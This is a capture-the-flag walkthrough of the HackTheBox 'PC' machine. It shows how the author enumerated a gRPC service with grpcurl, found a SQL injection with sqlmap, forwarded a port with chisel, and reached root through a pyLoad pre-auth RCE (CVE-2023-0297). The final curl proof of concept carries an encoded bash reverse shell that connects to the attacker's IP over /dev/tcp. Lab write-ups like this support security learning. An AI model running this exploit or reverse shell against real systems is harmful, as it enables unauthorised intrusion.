# HackTheBox - PC
## NMAP
```bash
Nmap scan report for 10.129.19.240
Host is up (0.21s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown
```
## PORT 50051
Connecting to this port through `telnet` or `netcat`, doesn't yield anything but `???`
So resarching what runs on port 50051 shows that, gRPC uses this port which is an open source remote procedure call framework by google
We can analyze the traffic through `wireshark` by sniffing packets on our interface (tun0) and changing protocol to HTTP/2
gRPC can be enumerated through `grpcurl`
```bash
grpcurl -plaintext 10.129.19.240:50051 list
```
This listed two services, let's try listing the methods in `SimpleApp`
SimpleApp service has three methods which can be checked with `describe` arguement
We can register and login with an account which in return provides an id
```bash
grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/RegisterUser
grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/LoginUser
```
Now using `getInfo` will ask for a token
## Foothold
If we go back to login method, we do use a token if we enable verbosity with `-vv`
```bash
grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" 10.129.19.240:50051 SimpleApp/getInfo
```
This gives us an error `Unexpected : bad argument type for built-in operation` due to we haven't specified the data, if we use `describe` to see what parameters the method accepts
It needs the ID which we get after logging in
```bash
grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" -d '{"id": "842"}' 10.129.19.240:50051 SimpleApp/getInfo
```
But tampering/playing around with this was a little difficult, so I tried postman and grpcui which gives you GUI with which you can work with gRPC service and also intercept the requests easily
After identifiying that it was using some filters for sqli, we can try running `sqlmap` which found injection on `id` parameter
With these credentials, we can login as `sau` user
Having enumerated the SUIDs, the files which are owned sau none of them yield any path to escalation, checking the local ports, there was port 8000 open which redirects to a login page
Port forwarding with `chisel`
```bash
chisel server -p 3333 --reverse
chisel client 10.10.16.19:3333 R:localhost:8000
```
Now accessing the port on our browser we'll get a login page for pyLoad which is a download manager for python
Trying the default creds like `admin:admin` and `pyload:pyload` didn't work, so searching for CVEs there was a pre-auth rce vulnerability (CVE-2023-0297)
Using the poc we'll get a shell as the root user
```bash
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"%2Fbin%2Fbash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E16%2E19%2F2222%200%3E%261%27\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'
```
## References
- https://grpc.io/blog/wireshark/
- https://github.com/fullstorydev/grpcurl
- https://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9
- https://security.snyk.io/vuln/SNYK-PYTHON-PYLOADNG-3230895
- https://security.snyk.io/vuln/SNYK-PYTHON-PYLOADNG-3230895